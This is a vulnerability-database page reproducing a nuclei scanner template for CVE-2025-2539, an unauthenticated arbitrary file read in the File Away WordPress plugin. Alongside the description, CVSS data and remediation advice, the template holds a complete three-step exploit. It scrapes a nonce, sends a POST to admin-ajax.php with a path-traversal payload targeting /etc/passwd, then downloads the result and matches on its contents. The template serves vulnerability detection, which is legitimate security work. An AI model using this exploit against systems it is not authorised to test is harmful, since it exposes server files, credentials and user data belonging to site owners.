Lucene search
K

File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

File Away plugin for WordPress allows unauthenticated file read due to missing authorization check.

Related
Refs
Code
id: CVE-2025-2539

info:
  name: File Away <= 3.9.9.0.1 - Missing Authorization to Unauthenticated Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    The File Away plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the ajax() function in all versions up to, and including, 3.9.9.0.1. This makes it possible for unauthenticated attackers, leveraging the use of a reversible weak algorithm,  to read the contents of arbitrary files on the server, which can contain sensitive information.
  impact: |
    Unauthenticated attackers can exploit weak encryption and missing authorization to read arbitrary files from the server, potentially exposing sensitive documents, configuration files, and user data.
  remediation: |
    Upgrade to File Away version 3.9.9.1 or later that implements proper capability checks and stronger encryption.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-away/file-away-39901-missing-authorization-to-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_encrypted.php
    - https://plugins.trac.wordpress.org/browser/file-away/trunk/lib/cls/class.fileaway_stats.php
    - https://wordpress.org/plugins/file-away/#developers
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b23bd5c-db27-4d63-8461-1f36958a2ff6?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-2539
    cwe-id: CWE-327
    epss-score: 0.0155
    epss-percentile: 0.72085
  metadata:
    verified: true
    max-request: 1
    publicwww-query: "/wp-content/plugins/file-away/"
  tags: cve,cve2025,lfi,file-away,wordpress,wp-plugin,wp,vkev,vuln

flow: http(1) && http(2) && http(3)

http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'fileaway_stats.*admin-ajax.php","nonce":"([0-9a-zA-Z]+)"}'
        internal: true

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=fileaway-stats&nonce={{nonce}}&file=/../../../../../../../../etc/passwd

    matchers:
      - type: word
        part: body
        internal: true
        words:
          - fileaway_download

    extractors:
      - type: regex
        part: body
        internal: true
        name: download_url
        group: 1
        regex:
          - '".*(\?.*?)"'

  - raw:
      - |
        GET /{{download_url}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: content_type
        words:
          - "application/force-download"
# digest: 4a0a0047304502204fcc41e144a20a982d3838cfb0ebcd558e9b1614ff14584cfd164e98bd1ebba7022100f6b6621f12ad74e9b5034d950d90e661c00e64c0218fd448dff98113146ef9a4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.17.5
EPSS0.0155
SSVC
28